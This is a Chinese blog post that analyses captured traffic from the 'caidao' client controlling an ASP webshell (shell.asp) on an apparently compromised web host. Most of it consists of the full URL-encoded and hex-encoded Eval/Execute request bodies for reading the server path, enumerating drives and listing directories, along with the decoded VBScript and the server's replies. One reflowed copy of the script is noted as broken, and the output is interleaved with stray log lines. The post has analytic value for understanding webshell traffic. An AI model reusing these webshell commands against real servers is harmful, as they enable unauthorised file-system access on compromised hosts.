菜刀 ASP链接SHELL 抓包结果及分析

http://blog.csdn.net/webxscan     神龙


&chr(9)      TAB  \t

&chr(58)     :
:       语句分隔符(相当于换行)

WebRoot   获取  SHELL信息
#获取路径(以下为抓到的请求体,参数 x;bd() 把十六进制串解码成其后列出的 VBScript,响应内容夹在 ->| 与 |<- 两个标记之间)
x=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A4966204572722054

68656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E57726974652

85329"""")):Response.Write(""""|<-""""):Response.End"")")

' Decoded form of the hex string passed to bd() in the captured request above.
' Builds one response line: the physical path mapped from ".", a TAB, then every
' drive letter followed by ":".
' chr(9) is TAB, used as the field separator in the reply.
Dim S:S=Server.Mappath(".")&chr(9)
' FileSystemObject is only needed for the drive list.
SET C=CreateObject("Scripting.FileSystemObject")
' "If Err" is meaningful because the request wrapper prepends
' "On Error Resume Next:" to this text before executing it.
If Err Then
' Object creation failed: discard the error and reply with the path alone.
Err.Clear
Else
For Each D in C.Drives
' chr(58) is ":", so the drives come back as "C:D:E:..." with no separator.
S=S&D.DriveLetter&chr(58)
Next
End If
' The wrapper writes "->|" before and "|<-" after this output.
' NOTE(review): the drive list reflects what the account running the script can
' enumerate - presumably the IIS worker identity; confirm when triaging.
Response.Write(S)

->|d:\virtualhost\host7377245\www\upload\newsimage\shell.asp    C:D:E:R:|<-


##################################
FileManage   通过目录获取文件列表信息
获取目录(目录路径以十六进制放在请求体末尾的 z1 参数中,由 bd(Request("z1")) 解码)
x=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""
44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D20464426223

0223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D617444

61746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A5345542

0433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6E7365

2E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E5772697465204

62E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E6174747269627574

657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F64696669656429266368722

83929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966
"""")):Response.Write(""""|<-""""):Response.End"")")
&z1=643A5C5C7669727475616C686F73745C5C686F7374373337373234355C5C7777775C5C75706C6F61645C5C6E657773696D6167655C5C7368656C6C2E6173705C5C

' RR is the directory to list: the z1 request parameter, hex-decoded by bd().
' bd() is defined in the request wrapper, not in this decoded listing.
' In this capture z1 decodes to the shell.asp\ path with doubled backslashes.
Dim RR:RR=bd(Request("z1"))
' FD(dt): formats a date value as "YYYY-MM-DD HH:MM:SS".
' Month, day and second are left-padded with "0" when they are one digit long.
' The captured reply shows the result, e.g. "2016-01-06 14:02:59".
Function FD(dt)
FD=Year(dt)&"-"
If Len(Month(dt))=1 Then
FD = FD&"0"
End If
FD=FD&Month(dt)&"-"
If Len(Day(dt))=1 Then
FD=FD&"0"
End If
' FormatDateTime(dt,4) is the short-time form (hh:mm, 24-hour); seconds are
' appended separately below.
FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"
If Len(Second(dt))=1 Then
FD=FD&"0"
End If
FD=FD&Second(dt)
End Function
' Lists the directory held in RR: one line per subfolder, then one line per file.
' Fields are separated by TAB (chr(9)); each record ends with LF (chr(10)).
SET C=CreateObject("Scripting.FileSystemObject")
' The path from the request is passed to GetFolder as received, with no check
' on which directory it names.
Set FO=C.GetFolder(""&RR&"")
If Err Then
' On failure the reply carries the VBScript error text after "ERROR:// ".
Response.Write("ERROR:// "&Err.Description)
Err.Clear
Else
' Subfolder record: name + "/" (chr(47)), modified time, literal "0" (chr(48))
' in the size column, attributes value.
For Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)
Next
' File record: name, modified time, size, attributes value.
For Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)
Next
End If

' Same directory-listing script as the decoded listing above, with the line
' breaks removed.
' NOTE(review): this copy is not runnable as shown. Statements run together and
' "&&chr(48)" is not valid VBScript, presumably an artifact of the author's
' search-and-replace. It also reads "ERROR: " where the decoded payload has
' "ERROR:// ".
Dim RR:RR=bd(Request("z1"))Function FD(dt)FD=Year(dt)&"-"If Len(Month(dt))=1 ThenFD = FD&&chr(48)End IfFD=FD&Month(dt)&"-"If Len(Day(dt))=1 ThenFD=FD&&chr(48)End IfFD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"If Len(Second(dt))=1 ThenFD=FD&&chr(48)End IfFD=FD&Second(dt)End FunctionSET C=CreateObject("Scripting.FileSystemObject")Set FO=C.GetFolder(""&RR&"")If Err ThenResponse.Write("ERROR: "&Err.Description)Err.ClearElseFor Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)NextFor Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)NextEnd If


->|z/    2016-01-06 14:02:59    0    16
20151125161429379.jpg    2015-11-25 16:14:29    27    1
20151125161501308.jpg    2015-11-25 16:15:01    27    1
20151126152910502.jpg    2015-11-26

15:29:10    27    1
20151127140949237.jpg    2015-11-27 14:09:49    27    1
20151127141016802.jpg    2015-11-27 14:10:16    27    1
20151128121918619.jpg    2015-11-28 12:19:18    27    

1
20151128122050259.jpg    2015-11-28 12:20:50    27    1
20151129134832033.jpg    2015-11-29 13:48:33    27    1
20151129134914657.jpg    2015-11-29 13:49:14    27    1
20151130131448878.jpg    2015-11-30 13:14:48    27    1
20151130131502483.jpg    2015-11-30 13:15:02    27    1
20151201201439010.jpg    2015-12-01 20:14:39    27    1
20151201201635647.jpg    2015-12-01 20:16:35    27    1
20151202155709826.jpg    2015-12-02 15:57:09    27    1
20151202155810417.jpg    2015-12-02 15:58:10    27    1
20151203161010273.jpg    2015-12-03 16:10:10    27    1
20151203161106179.jpg    2015-12-03 16:11:06    27    

Receive: Return Code: 0x00000000
1
20151204143314886.jpg    2015-12-04 14:33:14    27    1
20151206134439872.jpg    2015-12-06 13:44:39    27    1
20151206134534952.jpg    2015-12-06 13:45:34    27    1
20151207122215148.jpg    2015-12-07 12:22:15    27    1
201512

Receive: Return Code: 0x00000000
07122330608.jpg    2015-12-07 12:23:30    27    1
20151208130657123.jpg    2015-12-08 13:06:57    27    1
20151208130759351.jpg    2015-12-08 13:07:59    27    1
20151209143924394.jpg    2015

-12-09 14:39:24    27    1
20151209144048891.jpg    2015-12-09 14:40:48    27    1
20151210140328146.jpg    2015-12-10 14:03:28    27    1
20151210140553956.jpg    2015-12-10 14:05:53    27    

1
20151211131426653.jpg    2015-12-11 13:14:26    27    1
20151212141046434.jpg    2015-12-12 14:10:46    27    1
20151212141301143.jpg    2015-12-12 14:13:01    27    1
20151213125012208.jpg    2015-12-13 12:50:12    27    1
2


